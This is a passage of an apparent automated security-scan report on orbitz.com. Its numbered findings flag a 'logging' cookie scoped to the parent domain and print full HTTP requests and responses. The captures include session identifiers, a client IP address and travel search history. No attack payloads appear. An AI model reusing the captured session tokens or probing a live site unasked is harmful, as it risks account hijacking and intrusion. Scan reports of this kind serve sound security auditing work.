DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/PrepareFlightsTab?z=2eb9&r=c HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.486. http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareFlightsTab&type=el_dp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/PrepareFlightsTab&type=el_dp HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OSC=436663F5D03CEDD27352E439D9083E4F; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Location: http://www.orbitz.com/App/Home?z=d68a&r=1
Content-Length: 0
Date: Wed, 02 Feb 2011 16:11:52 GMT

11.487. http://www.orbitz.com/App/PrepareSearchResult previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareSearchResult

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/PrepareSearchResult HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.488. http://www.orbitz.com/App/PrepareVacationsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareVacationsHome

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/PrepareVacationsHome?z=2eb7&r=a HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.489. http://www.orbitz.com/App/Sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Sitemap

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/Sitemap?z=2edb&r=1a HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.490. http://www.orbitz.com/App/SubmitQuickSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/SubmitQuickSearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/SubmitQuickSearch?z=2ebe&r=h HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.491. http://www.orbitz.com/App/ViewDHTMLCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewDHTMLCalendar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewDHTMLCalendar?z=2ec5&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651

Response

11.492. http://www.orbitz.com/App/ViewHotelSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewHotelSearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewHotelSearch?retrieveParams=true&searchMethodHidden=expand&expandSearchOptions=true&z=2ec2&r=l HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: OSC=3D7B80A1E27EBAB37F9A4F9BD9B3D63E; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Location: http://www.orbitz.com/shop/hotelsearch?hotel.hotelSearchDetails.checkinDate=02%2F09%2F11&strf=7&hotel.hotelSearchDetails.hotelRoom.numberOfAdults=2&hotel.locationKeywordInput.key=Enter+city+or+point+of+interest...&hotel.typeOfSearch=keyword&hotel.hotelSearchDetails.checkoutDate=02%2F11%2F11&hotel.hotelSearchDetails.numberOfRooms=1&type=hotel
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Length: 0
Date: Wed, 02 Feb 2011 16:06:47 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

11.493. http://www.orbitz.com/App/ViewMyAccount previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewMyAccount

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewMyAccount?shadowing=false HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: OSC=034BDB0327875838AA240D732B172D93; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Location: https://www.orbitz.com/Secure/ViewMyAccount?shadowing=false
Content-Length: 0
Date: Wed, 02 Feb 2011 16:11:44 GMT

11.494. http://www.orbitz.com/App/ViewRSSHelpPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRSSHelpPage

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewRSSHelpPage HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

11.495. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
